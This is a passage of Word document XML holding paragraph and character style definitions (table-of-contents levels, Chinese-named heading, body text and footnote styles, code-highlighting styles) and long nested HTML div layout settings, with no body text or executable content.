    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007B6F18"/>
    <w:pPr>
      <w:ind w:leftChars="1000" w:left="2100"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="22"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007B6F18"/>
    <w:pPr>
      <w:ind w:leftChars="1200" w:left="2520"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="22"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007B6F18"/>
    <w:pPr>
      <w:ind w:leftChars="1400" w:left="2940"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="22"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007B6F18"/>
    <w:pPr>
      <w:ind w:leftChars="1600" w:left="3360"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="22"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:rsid w:val="00B26C00"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:cstheme="minorBidi"/>
      <w:b/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ac">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00A51BCE"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="line">
    <w:name w:val="line"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00E02807"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="comment">
    <w:name w:val="comment"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00614497"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="function">
    <w:name w:val="function"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00614497"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="keyword">
    <w:name w:val="keyword"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00614497"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="params">
    <w:name w:val="params"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00614497"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="builtin">
    <w:name w:val="built_in"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00614497"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ad">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="ae"/>
    <w:rsid w:val="00095502"/>
    <w:rPr>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ae">
    <w:name w:val="正文文本 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ad"/>
    <w:rsid w:val="00095502"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:color w:val="FF0000"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c1">
    <w:name w:val="c1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00381B01"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af0"/>
    <w:rsid w:val="00634F46"/>
    <w:pPr>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af0">
    <w:name w:val="脚注文本 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af"/>
    <w:rsid w:val="00634F46"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af1">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00634F4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19808">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="17196004">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1438524332">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="420"/>
          <w:marBottom w:val="420"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="32386805">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="93327409">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="903567570">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2021540111">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="127013966">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="112477634">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="792405095">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="652412101">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="215089685">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1643927048">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="185366490">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="413477227">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="147720748">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1236937973">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1441146805">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1769227183">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="990209565">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="232203439">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1714767928">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1023362472">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1774781583">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1901012368">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="314918610">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="220482843">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="362243317">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="569123277">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1019895966">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="996112641">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1474101907">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1444879529">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="579406214">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1961573167">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="303856337">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1365327114">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="128407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34082">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="508565779">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="114643687">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="157306776">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1793863927">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="461191199">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="159471058">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="165679500">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1086878478">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="240"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="170607550">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1525051501">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="999652678">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
